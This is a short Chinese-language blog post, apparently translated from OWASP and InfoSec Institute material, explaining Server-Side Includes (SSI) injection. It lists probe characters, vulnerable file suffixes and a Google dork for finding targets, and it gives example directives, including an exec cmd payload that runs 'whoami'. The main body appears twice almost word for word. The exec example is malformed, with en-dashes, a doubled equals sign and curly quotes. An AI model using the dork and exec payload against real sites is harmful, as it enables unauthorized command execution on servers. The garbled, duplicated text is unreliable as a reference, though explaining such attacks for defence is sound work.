本文深入探讨了服务器端包含注入 (SSI) 攻击的原理、常见漏洞利用方法及防御策略,包括识别后缀漏洞、利用 SSI 命令执行恶意代码等,并提供了实际案例分析。
原文地址:[url]https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
[/url]
[url]http://resources.infosecinstitute.com/server-side-includes-ssi-injection/[/url]
服务器端包含注入SSI出现在动态填写HTML页面的场合。他们类似于CGIs,但是SSI用于在页面加载之前执行一些动作。为了这样,web服务器在提供页面给user之前分析SSI。
SSI攻击允许通过在HTML页面注入脚本或远程执行任意代码。可以通过操控SSI的使用或在user输入域中使用。
通过[quote]< ! # = / . " - > and [a-zA-Z0-9] [/quote]检查漏洞
另一种方法是识别页面是否包含 .stm, .shtm 和 .shtml后缀。
[color=blue]google dork:inurl:bin/cklb[/color]
可能导致操作文件系统和操控web服务器权限的进程。
例子:
[quote]<!--#echo var="DOCUMENT_NAME" -->[/quote]
显示当前文件名
[quote]<!--#echo var="DOCUMENT_URI" -->[/quote]
显示虚拟进程和文件名
[quote]<!--#config timefmt="A %B %d %Y %r"-->[/quote]
使用config和timefmt命令来控制时间和日期的格式
[quote]<!--#fsize file="ssi.shtml" -->[/quote]
显示选择的文件的大小
[quote] <!–#exec cmd==”whoami” –>.[/quote]
显示当前user
[/url]
[url]http://resources.infosecinstitute.com/server-side-includes-ssi-injection/[/url]
服务器端包含注入SSI出现在动态填写HTML页面的场合。他们类似于CGIs,但是SSI用于在页面加载之前执行一些动作。为了这样,web服务器在提供页面给user之前分析SSI。
SSI攻击允许通过在HTML页面注入脚本或远程执行任意代码。可以通过操控SSI的使用或在user输入域中使用。
通过[quote]< ! # = / . " - > and [a-zA-Z0-9] [/quote]检查漏洞
另一种方法是识别页面是否包含 .stm, .shtm 和 .shtml后缀。
[color=blue]google dork:inurl:bin/cklb[/color]
可能导致操作文件系统和操控web服务器权限的进程。
例子:
[quote]<!--#echo var="DOCUMENT_NAME" -->[/quote]
显示当前文件名
[quote]<!--#echo var="DOCUMENT_URI" -->[/quote]
显示虚拟进程和文件名
[quote]<!--#config timefmt="A %B %d %Y %r"-->[/quote]
使用config和timefmt命令来控制时间和日期的格式
[quote]<!--#fsize file="ssi.shtml" -->[/quote]
显示选择的文件的大小
[quote] <!–#exec cmd==”whoami” –>.[/quote]
显示当前user
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
